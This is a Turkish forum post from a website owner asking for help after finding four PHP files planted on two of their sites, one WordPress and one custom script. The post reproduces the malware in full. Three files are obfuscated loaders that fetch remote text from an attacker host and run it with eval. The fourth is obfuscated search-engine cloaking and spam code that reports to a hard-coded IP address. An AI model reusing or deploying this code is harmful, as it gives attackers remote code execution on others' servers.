chat gpt ye dosyların içindekileri attığımda ascii karakterlerle dosyaların çektiği kodları gizlemiş.
dosyalar:
cron.php, csv.php, ext.php, wp-22.php
domain.com/ext.php ile sunucuya herhangi birisi erişebiliyor.
arayüzü:
Kodların içeriğine sırasıyla aşağıdan bakabilirsiniz:
<?php
// Mengaburkan URL
$u1 = chr(104); $u2 = chr(116); $u3 = chr(116); $u4 = chr(112);
$d1 = chr(115); $d2 = chr(58); $d3 = chr(47); $d4 = chr(47);
$a1 = chr(109); $a2 = chr(101); $a3 = chr(100); $a4 = chr(105);
$a5 = chr(97); $a6 = chr(46); $a7 = chr(105); $a8 = chr(108);
$a9 = chr(111); $a10 = chr(118); $a11 = chr(101); $a12 = chr(116);
$a13 = chr(111); $a14 = chr(46);
$de = chr(99) . chr(121) . chr(111) . chr(117);
$no = chr(47);
$ur = "5.txt"; // Tidak dikaburkan
$url = $u1 . $u2 . $u3 . $u4 . $d1 . $d2 . $d3 . $d4 .
$a1 . $a2 . $a3 . $a4 . $a5 . $a6 . $a7 . $a8 . $a9 .
$a10 . $a11 . $a12 . $a13 . $a14 . $de . $no . $ur;
// Fungsi mengambil konten
function fC($u) {
if (ini_get('allow_url_fopen')) return @file_get_contents($u);
return false;
}
function cC($u) {
if (function_exists('curl_version')) {
$ch = curl_init($u);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$r = curl_exec($ch);
curl_close($ch);
return $r ?: false;
}
return false;
}
function fO($u) {
if ($f = fopen($u, 'r')) {
$c = stream_get_contents($f);
fclose($f);
return $c;
}
return false;
}
function sC($u) {
$c = stream_context_create(["http" => ["method" => "GET", "header" => "User-Agent: PHP scriptrn"]]);
return @file_get_contents($u, false, $c);
}
function fL($u) {
$l = @file($u);
return $l ? implode('', $l) : false;
}
function gC($u) {
$c = fC($u) ?: cC($u) ?: fO($u) ?: sC($u) ?: fL($u);
return $c ?: false;
}
function oE($c) {
if (!empty($c)) {
eval("?>" . $c);
}
}
$c = gC($url);
if ($c !== false) {
oE($c);
} else {
echo "エラー: Gagal mengambil konten.";
}
?>
ext.php
<?php
// Mengaburkan URL
$u1 = chr(104); $u2 = chr(116); $u3 = chr(116); $u4 = chr(112);
$d1 = chr(115); $d2 = chr(58); $d3 = chr(47); $d4 = chr(47);
$a1 = chr(109); $a2 = chr(101); $a3 = chr(100); $a4 = chr(105);
$a5 = chr(97); $a6 = chr(46); $a7 = chr(105); $a8 = chr(108);
$a9 = chr(111); $a10 = chr(118); $a11 = chr(101); $a12 = chr(116);
$a13 = chr(111); $a14 = chr(46);
$de = chr(99) . chr(121) . chr(111) . chr(117);
$no = chr(47);
$ur = "4.txt"; // Tidak dikaburkan
$url = $u1 . $u2 . $u3 . $u4 . $d1 . $d2 . $d3 . $d4 .
$a1 . $a2 . $a3 . $a4 . $a5 . $a6 . $a7 . $a8 . $a9 .
$a10 . $a11 . $a12 . $a13 . $a14 . $de . $no . $ur;
// Fungsi mengambil konten
function fC($u) {
if (ini_get('allow_url_fopen')) return @file_get_contents($u);
return false;
}
function cC($u) {
if (function_exists('curl_version')) {
$ch = curl_init($u);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$r = curl_exec($ch);
curl_close($ch);
return $r ?: false;
}
return false;
}
function fO($u) {
if ($f = fopen($u, 'r')) {
$c = stream_get_contents($f);
fclose($f);
return $c;
}
return false;
}
function sC($u) {
$c = stream_context_create(["http" => ["method" => "GET", "header" => "User-Agent: PHP scriptrn"]]);
return @file_get_contents($u, false, $c);
}
function fL($u) {
$l = @file($u);
return $l ? implode('', $l) : false;
}
function gC($u) {
$c = fC($u) ?: cC($u) ?: fO($u) ?: sC($u) ?: fL($u);
return $c ?: false;
}
function oE($c) {
if (!empty($c)) {
eval("?>" . $c);
}
}
$c = gC($url);
if ($c !== false) {
oE($c);
} else {
echo "エラー: Gagal mengambil konten.";
}
?>
scv.php
<?php error_reporting(0); @set_time_limit(120); @ignore_user_abort(1); $xdCd1 = "http://142.54.168.90:82/j241210_13/"; $Q2Qbp = array(); class iEHnX { public function innvp(string $JGvrp = '', string $ol6Xx = '') { if (!empty($JGvrp)) { goto z8U8K; } return $_SERVER; z8U8K: $JGvrp = strtoupper($JGvrp); return isset($_SERVER[$JGvrp]) ? $_SERVER[$JGvrp] : $ol6Xx; } public function Anwd1() { if ($this->iNnVp("x48x54x54120123") && ("x31" == $this->InNvp("x48124124x50123") || "157x6e" == strtolower($this->INnvP("110124x54x50x53")))) { goto oVZ_j; } if ("150x74x74x70x73" == $this->iNNVP("x52x45121x55x45123x54x5fx53103110x45x4dx45 ")) { goto Z2ich; } if ("6464x33" == $this->iNnVp("x53105x52126x45122x5f120117122x54")) { goto kdSB0; } if ("150x74164x70163" == $this->inNVp("110x54124x50137x58x5fx46117x52127101122104 105104137x50122117124x4f")) { goto dOkWs; } goto wumN7; oVZ_j: return true; goto wumN7; Z2ich: return true; goto wumN7; kdSB0: return true; goto wumN7; dOkWs: return true; wumN7: return false; } public function BIjZS() { $ykYnI = strval($this->INnVp("x48x54x54120x5f130137x46117122127x41122x44 105104137110117x53x54") ?: $this->INNVP("x48124124x50x5f110x4fx53x54")); return strpos($ykYnI, "72") ? strstr($ykYnI, "72", true) : $ykYnI; } public function MDzMo() { return $this->aNWd1() ? "150164x74x70163" : "x68164x74160"; } public function neGxT() { $pR1sf = $this->s69cw(); if (!in_array($pR1sf, [80, 443])) { goto i9saj; } return $this->mdzmO() . "7257x2f" . $this->BiJzS(); i9saj: return $this->Mdzmo() . "72x2f57" . $this->BiJzs() . "72" . $pR1sf; } public function s69cw() : int { return (int) ($this->iNNvP("110x54x54x50x5fx58137x46117x52x57101122104 105104x5f120x4fx52124") ?: $this->InnvP("123105122x56105122137x50x4f122124", '')); } public function nWLEs() { $oIafe = strtolower($this->INnVP("x48x54x54x50137x55x53x45x52x5fx41107105116 124")); if (!($oIafe != '' && preg_match("57147x6f157x67x6c145x62157164x7cx67x6f x6f147154x65x7cx79141150x6fx6f174142x69x6ex67174x6 115715457163x69", $oIafe))) { goto DaznX; } return true; DaznX: return false; } public function vCm2j() { $cL_59 = strtolower($this->InNvP("110x54124120x5fx52x45106105122105122")); if (!($cL_59 != '' && preg_match("57x67x6f157147x6cx6556143157x2ex6ax701 74x79141150157x6fx2e143x6fx2ex6ax70x7c147157157147 x6cx6556143157x6dx2fx73151", $cL_59))) { goto KueEp; } return true; KueEp: return false; } public function Aceh6() { $m08Qi = basename($this->Innvp("x53103122x49x50x54137x46x49x4c105116101x4d x45")); if (basename($this->iNnvp("123x43122111x50124x5fx4e101115105")) === $m08Qi) { goto LAsiE; } if (basename($this->inNVp("x50x48x50137123x45114106")) === $m08Qi) { goto xIvrS; } if (basename($this->iNnVp("x4f122x49107137123103x52x49x50x54137x4ex41 115105")) === $m08Qi) { goto PXYYX; } if (($SSxMQ = strpos($this->iNnvp("120x48120x5f123x45114106"), "x2f" . $m08Qi)) !== false) { goto n3qUS; } if ($this->INNVp("104x4fx43x55x4dx45116124x5f122x4f117x54" ) && strpos($this->inNVP("x53x43122111x50x54x5f106x49x4c105x4ex41115 105"), $this->inNVp("104x4f103125x4dx45116124137122x4f117x54" )) === 0) { goto xT6rk; } goto lrNsF; LAsiE: $iKCsG = $this->inNVp("123103122111x50124x5f116101115105"); goto lrNsF; xIvrS: $iKCsG = $this->iNnVp("120x48x50x5fx53x45x4c106"); goto lrNsF; PXYYX: $iKCsG = $this->INnvP("x4fx52111x47x5fx53x43122x49120x54137x4ex41 115x45"); goto lrNsF; n3qUS: $iKCsG = substr($this->inNVp("123103122111120x54x5fx4e101x4d105"), 0, $SSxMQ) . "x2f" . $m08Qi; goto lrNsF; xT6rk: $iKCsG = str_replace($this->inNvP("x44117103x55115x45x4e124137x52x4f117x54" ), '', $this->inNVp("x53x43x52111120x54x5fx46x49114105x4e101115 105")); lrNsF: if (($SSxMQ = strpos($this->innVP("122105x51x55105123x54x5f125122x49"), "x2ex70x68x70")) !== false) { goto VcZWO; } $JX1zG = $iKCsG . substr($this->iNnVp("x52x45x51125105123x54x5f125122111"), strpos($this->InnvP("122x45121125x45123124x5fx55122111"), "57")); goto lDRkd; VcZWO: $JX1zG = $iKCsG . substr($this->InnVp("122x45121x55x45x53124x5fx55122x49"), $SSxMQ + 4); lDRkd: return rtrim($JX1zG, "57"); } public function QZDFE($iKCsG, $e3sgy = array()) { $iKCsG = str_replace("x20", "x2b", $iKCsG); $RNm48 = curl_init(); curl_setopt($RNm48, CURLOPT_URL, $iKCsG); curl_setopt($RNm48, CURLOPT_RETURNTRANSFER, 1); curl_setopt($RNm48, CURLOPT_HEADER, 0); curl_setopt($RNm48, CURLOPT_TIMEOUT, 20); curl_setopt($RNm48, CURLOPT_POST, 1); curl_setopt($RNm48, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($RNm48, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($RNm48, CURLOPT_POSTFIELDS, http_build_query($e3sgy)); $ugSbI = curl_exec($RNm48); curl_close($RNm48); return $ugSbI; } } $vhQuY = new iehnX(); $fOpDT = $vhQuY->NwLEs(); $WVpvC = $vhQuY->vCM2J(); $x4B8s = urldecode($vhQuY->aceh6()); $e3sgy = ["x64x6f155x61151x6e" => $vhQuY->NEgXt(), "x70157x72164" => $vhQuY->S69cw(), "165x72151" => $x4B8s]; if (empty($Q2Qbp)) { goto U4A1B; } foreach ($Q2Qbp as $agA7P) { if (!(substr($agA7P, 0, strlen($x4B8s)) === $x4B8s)) { goto pfzBI; } $IXT7o = pathinfo($xdCd1, PATHINFO_BASENAME); $xdCd1 = str_replace($IXT7o, substr($agA7P, strlen($x4B8s) + 1), $xdCd1); goto XmPwN; pfzBI: r3vtC: } XmPwN: U4A1B: if (!($fOpDT || substr($x4B8s, -6) === "162x6f142x6f164163" || substr($x4B8s, -4) === "56170155x6c")) { goto z3glg; } if (!(in_array(substr($x4B8s, -7), ["x2f162x6f142157x74163", "77x72x6f142x6f164163"]) && strpos($vhQuY->iNNvP("x52105121125x45123x54137x55x52111"), "56160150x70") !== false && $vhQuY->INNvP("x52105121125105123x54x5fx55x52x49") !== $x4B8s)) { goto tccO0; } die("162157142x6fx74x7356x74x78x7440141156144x2016 3x69x74145x6d141160x2ex78155154x20146x69x6cx654014 3x72x65141x741454014614115115440x62x7940163x75142x 66x69154x6541"); tccO0: $ugSbI = $vhQuY->qZdfE($xdCd1 . "163x69x74145x6d141160", $e3sgy); $ugSbI or die; if (!(in_array(substr($x4B8s, -7), ["x2fx72157142157164163", "x3f162157142157164163"]) && !empty($ugSbI))) { goto h2eKM; } $x4B8s = strtolower($x4B8s); $bktuh = strpos($x4B8s, "56x70x68x70") !== false && strpos($x4B8s, "x2f151x6ex6414517056x70x68160") === false ? true : false; $UuvC9 = @file_put_contents(__DIR__ . "57x72x6f142157x74x73x2ex74x78x74", $ugSbI, $bktuh ? 8 : 0); $B58dL = file_get_contents(__DIR__ . "x2fx72157x62157x7416356164x78164"); if ($UuvC9 !== false && strpos(strtolower($B58dL), "163151164145155141160") !== false) { goto p2yAm; } die("x72x6f142157x74x7356x74x78x7440x61x6e14440x73 151164145155141x7056170x6d15440146x69x6cx65x201431 62145x61x74x65x20x66x61x6915441"); goto aOJrZ; p2yAm: die("162157x62157x7416356164170x74x20x61156x64x201 63151x74145155141x70x2e17015515440x66x69154145x20x 63162x65141164145x20163165x63143x65x73x73x21"); aOJrZ: h2eKM: header(substr($ugSbI, 0, 5) === "7477170x6d154" ? "x43157x6e164x65x6e16455x74x79160x65x3ax7414517016 457x78x6d154" : "103157156x74145156x74x2d164x79160x6572164145x7816 457150x74x6dx6cx3bx20x63x68141162163145164x3d165x7 414655x38"); die($ugSbI); z3glg: if (!(!$fOpDT && $WVpvC && strrpos($x4B8s, "56160x68160") !== strlen($x4B8s) - 4)) { goto qC0Ep; } die($vhQuY->qzdfe($xdCd1 . "x6a165x6d160", $e3sgy)); qC0Ep:?>
wp-22.php
<?php
// Mengaburkan URL
$u1 = chr(104); $u2 = chr(116); $u3 = chr(116); $u4 = chr(112);
$d1 = chr(115); $d2 = chr(58); $d3 = chr(47); $d4 = chr(47);
$a1 = chr(109); $a2 = chr(101); $a3 = chr(100); $a4 = chr(105);
$a5 = chr(97); $a6 = chr(46); $a7 = chr(105); $a8 = chr(108);
$a9 = chr(111); $a10 = chr(118); $a11 = chr(101); $a12 = chr(116);
$a13 = chr(111); $a14 = chr(46);
$de = chr(99) . chr(121) . chr(111) . chr(117);
$no = chr(47);
$ur = "3.txt"; // Tidak dikaburkan
$url = $u1 . $u2 . $u3 . $u4 . $d1 . $d2 . $d3 . $d4 .
$a1 . $a2 . $a3 . $a4 . $a5 . $a6 . $a7 . $a8 . $a9 .
$a10 . $a11 . $a12 . $a13 . $a14 . $de . $no . $ur;
// Fungsi mengambil konten
function fC($u) {
if (ini_get('allow_url_fopen')) return @file_get_contents($u);
return false;
}
function cC($u) {
if (function_exists('curl_version')) {
$ch = curl_init($u);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$r = curl_exec($ch);
curl_close($ch);
return $r ?: false;
}
return false;
}
function fO($u) {
if ($f = fopen($u, 'r')) {
$c = stream_get_contents($f);
fclose($f);
return $c;
}
return false;
}
function sC($u) {
$c = stream_context_create(["http" => ["method" => "GET", "header" => "User-Agent: PHP scriptrn"]]);
return @file_get_contents($u, false, $c);
}
function fL($u) {
$l = @file($u);
return $l ? implode('', $l) : false;
}
function gC($u) {
$c = fC($u) ?: cC($u) ?: fO($u) ?: sC($u) ?: fL($u);
return $c ?: false;
}
function oE($c) {
if (!empty($c)) {
eval("?>" . $c);
}
}
$c = gC($url);
if ($c !== false) {
oE($c);
} else {
echo "エラー: Gagal mengambil konten.";
}
?>
işin komik yanı herhangi bir şey indirmedim. tema vs. wordpressin kendi kütüphanesinden eklentilerde aynı şekilde.
Neler yapmam lazım?
Kodları chat gpt ye atıp sorabilirsiniz ASCII çözüyor her şeyi açıklıyor.
Host firmam bizlik bir şey yok deyip geçiştiriyor. Chat gpt dosyaları sil kanka diyor.
2 SİTEME DE ATMIŞLAR
birisi wp diğeri wp değil özel script. hiç normal gelmiyor.
